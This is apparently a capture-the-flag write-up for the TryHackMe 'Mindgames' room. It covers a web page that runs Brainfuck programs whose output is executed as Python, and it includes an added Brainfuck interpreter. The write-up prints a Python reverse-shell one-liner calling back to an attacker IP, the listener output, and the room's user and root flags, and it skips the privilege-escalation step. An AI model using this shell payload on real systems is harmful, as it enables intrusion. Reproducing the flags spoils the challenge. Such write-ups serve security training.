Description:
Just a terrible idea...
No hints. Hack it. Don't give up if you get stuck, enumerate harder

Link: https://tryhackme.com/room/mindgames

  • We start by enumerating the services with Nmap, then fetch the web server's home page with curl:

    user㉿parrot:/data/Mindgames$ curl -s http://10.10.211.54
    <!DOCTYPE html>
    <html>
    
    <head>
        <meta charset="utf-8">
        <meta http-equiv="X-UA-Compatible" content="IE=edge">
        <title>Mindgames.</title>
        <meta name="viewport" content="width=device-width, initial-scale=1">
        <link rel="stylesheet" type="text/css" media="screen" href="/main.css">
        <script src="/main.js"></script>
    </head>
    
    <body onload="onLoad()">
        <h1>Sometimes, people have bad ideas.</h1>
        <h1>Sometimes those bad ideas get turned into a CTF box.</h1>
        <h1>I'm so sorry.</h1> <!-- That's a lie, I enjoyed making this. -->
        <p>Ever thought that programming was a little too easy? Well, I have just the product for you. Look at the example code below, then give it a go yourself!</p>
        <p>Like it? Purchase a license today for the low, low price of 0.009BTC/yr!</p>
        <h2>Hello, World</h2>
        <pre><code>+[------->++<]>++.++.---------.+++++.++++++.+[--->+<]>+.------.++[->++<]>.-[->+++++<]>++.+++++++..+++.[->+++++<]>+.------------.---[->+++<]>.-[--->+<]>---.+++.------.--------.-[--->+<]>+.+++++++.>++++++++++.</code></pre>
        <h2>Fibonacci</h2>
        <pre><code>--[----->+<]>--.+.+.[--->+<]>--.+++[->++<]>.[-->+<]>+++++.[--->++<]>--.++[++>---<]>+.-[-->+++<]>--.>++++++++++.[->+++<]>++....-[--->++<]>-.---.[--->+<]>--.+[----->+<]>+.-[->+++++<]>-.--[->++<]>.+.+[-->+<]>+.[-->+++<]>+.+++++++++.>++++++++++.[->+++<]>++........---[----->++<]>.-------------.[--->+<]>---.+.---.----.-[->+++++<]>-.[-->+++<]>+.>++++++++++.[->+++<]>++....---[----->++<]>.-------------.[--->+<]>---.+.---.----.-[->+++++<]>-.+++[->++<]>.[-->+<]>+++++.[--->++<]>--.[----->++<]>+.++++.--------.++.-[--->+++++<]>.[-->+<]>+++++.[--->++<]>--.[----->++<]>+.+++++.---------.>++++++++++...[--->+++++<]>.+++++++++.+++.[-->+++++<]>+++.-[--->++<]>-.[--->+<]>---.-[--->++<]>-.+++++.-[->+++++<]>-.---[----->++<]>.+++[->+++<]>++.+++++++++++++.-------.--.--[->+++<]>-.+++++++++.-.-------.-[-->+++<]>--.>++++++++++.[->+++<]>++....[-->+++++++<]>.++.---------.+++++.++++++.+[--->+<]>+.-----[->++<]>.[-->+<]>+++++.-----[->+++<]>.[----->++<]>-..>++++++++++.</code></pre>
        <h2>Try before you buy.</h2>
        <form id="codeForm">
            <textarea id="code" placeholder="Enter your code here..."></textarea><br>
            <button>Run it!</button>
        </form>
        <p></p>
        <label for="outputBox">Program Output:</label>
        <pre id="outputBox"></pre>
    </body>
    </html>
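
Decoding the page's Hello, World sample offline shows what such a program emits before anything is sent to the service. This is an added example, not part of the original write-up or the room's code; `run_bf` and `emitted_calls` are hypothetical names, and the 30000-cell tape of wrapping 8-bit cells is an assumed dialect.

```python
import ast

# Hello, World sample copied from the page's HTML (split only for line length).
HELLO_SAMPLE = (
    "+[------->++<]>++.++.---------.+++++.++++++.+[--->+<]>+.------."
    "++[->++<]>.-[->+++++<]>++.+++++++..+++.[->+++++<]>+.------------."
    "---[->+++<]>.-[--->+<]>---.+++.------.--------.-[--->+<]>+.+++++++."
    ">++++++++++."
)

def run_bf(program, stdin=b"", max_steps=1_000_000):
    """Interpret Brainfuck on a 30000-cell tape of wrapping 8-bit cells."""
    jumps, stack = {}, []
    for i, ch in enumerate(program):          # pre-match the brackets
        if ch == "[":
            stack.append(i)
        elif ch == "]":
            if not stack:
                raise ValueError(f"unmatched ']' at offset {i}")
            j = stack.pop()
            jumps[i], jumps[j] = j, i
    if stack:
        raise ValueError(f"unmatched '[' at offset {stack[-1]}")
    tape, ptr, pc, steps = bytearray(30000), 0, 0, 0
    out, inp = bytearray(), iter(stdin)
    while pc < len(program):
        steps += 1
        if steps > max_steps:                 # bound runaway loops
            raise RuntimeError("step limit exceeded")
        ch = program[pc]
        if ch in "<>":
            ptr = (ptr + (1 if ch == ">" else -1)) % len(tape)
        elif ch in "+-":
            tape[ptr] = (tape[ptr] + (1 if ch == "+" else -1)) % 256
        elif ch == ".":
            out.append(tape[ptr])
        elif ch == ",":
            tape[ptr] = next(inp, 0)          # EOF reads as 0
        elif (ch == "[" and tape[ptr] == 0) or (ch == "]" and tape[ptr] != 0):
            pc = jumps[pc]                    # jump to the matching bracket
        pc += 1
    return out.decode("latin-1")

def emitted_calls(program):
    """Parse the program's output as Python (never executed); list called names."""
    tree = ast.parse(run_bf(program))
    return [n.func.id for n in ast.walk(tree)
            if isinstance(n, ast.Call) and isinstance(n.func, ast.Name)]
```

The sample decodes to the Python statement `print("Hello, World")`, so the program's output is Python source text rather than the greeting itself.
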
  • Intercepting the requests with Burp Suite reveals that the form sends its input to /api/bf, asynchronously, via JavaScript (main.js):

    async function postData(url = "", data = "") {
        // Default options are marked with *
        const response = await fetch(url, {
            method: 'POST', // *GET, POST, PUT, DELETE, etc.
            cache: 'no-cache', // *default, no-cache, reload, force-cache, only-if-cached
            credentials: 'same-origin', // include, *same-origin, omit
            headers: {
                'Content-Type': 'text/plain'
            },
            redirect: 'follow', // manual, *follow, error
            referrerPolicy: 'no-referrer', // no-referrer, *client
            body: data // body data type must match "Content-Type" header
        });
        return response; // We don't always want JSON back
    }
    function onLoad() {
        document.querySelector("#codeForm").addEventListener("submit", function (event) {
            event.preventDefault()
            runCode()
        });
    }
    async function runCode() {
        const programBox = document.querySelector("#code")
        const outBox = document.querySelector("#outputBox")
        outBox.textContent = await (await postData("/api/bf", programBox.value)).text()
    }
  • Reverse shell

    import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.8.50.72",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);
    
    user㉿parrot:/data/Mindgames$ rlwrap nc -nlvp 4444
    listening on [any] 4444 ...
    connect to [10.8.50.72] from (UNKNOWN) [10.10.211.54] 38032
    bash: cannot set terminal process group (677): Inappropriate ioctl for device
    bash: no job control in this shell
    mindgames@mindgames:~/webserver$ id
    id
    uid=1001(mindgames) gid=1001(mindgames) groups=1001(mindgames)
    mindgames@mindgames:~/webserver$ 
  • USER FLAG:

    mindgames@mindgames:~/webserver$ cd /home
    cd /home
    mindgames@mindgames:/home$ ls -l
    ls -l
    total 8
    drwxr-xr-x 6 mindgames mindgames 4096 May 11 15:36 mindgames
    drwxr-x--- 5 tryhackme tryhackme 4096 May 11 15:25 tryhackme
    mindgames@mindgames:/home$ cd mindgames
    cd mindgames
    mindgames@mindgames:~$ ls -la
    ls -la
    total 40
    drwxr-xr-x 6 mindgames mindgames 4096 May 11 15:36 .
    drwxr-xr-x 4 root      root      4096 May 11 13:48 ..
    lrwxrwxrwx 1 mindgames mindgames    9 May 11 15:25 .bash_history -> /dev/null
    -rw-r--r-- 1 mindgames mindgames  220 May 11 13:48 .bash_logout
    -rw-r--r-- 1 mindgames mindgames 3771 May 11 13:48 .bashrc
    drwx------ 2 mindgames mindgames 4096 May 11 14:07 .cache
    drwx------ 3 mindgames mindgames 4096 May 11 14:07 .gnupg
    drwxrwxr-x 3 mindgames mindgames 4096 May 11 15:24 .local
    -rw-r--r-- 1 mindgames mindgames  807 May 11 13:48 .profile
    -rw-rw-r-- 1 mindgames mindgames   38 May 11 15:24 user.txt
    drwxrwxr-x 3 mindgames mindgames 4096 May 11 15:36 webserver
    mindgames@mindgames:~$ cat user.txt
    cat user.txt
    thm{411f7d38247ff441ce4e134b459b6268}
  • ROOT FLAG:

    mindgames@mindgames:/etc/systemd/system/multi-user.target.wants$ cat server.service 
    [Unit]
    Description=Production Web Server
    
    [Service]
    User=mindgames
    Group=mindgames
    WorkingDirectory=/home/mindgames/webserver
    ExecStart=/home/mindgames/webserver/server -p 80
    Restart=always
    RestartSec=5
    
    [Install]
    WantedBy=multi-user.target
    mindgames@mindgames:/etc/systemd/system/multi-user.target.wants$ ls -la server.service 
    lrwxrwxrwx 1 root root 34 May 11 15:33 server.service -> /etc/systemd/system/server.service

Finally:

root@mindgames:~# cat /root/root.txt 
thm{1974a617cc84c5b51411c283544ee254}

SUMMARY:

User flag.
thm{411f7d38247ff441ce4e134b459b6268}

Root flag.
thm{1974a617cc84c5b51411c283544ee254}
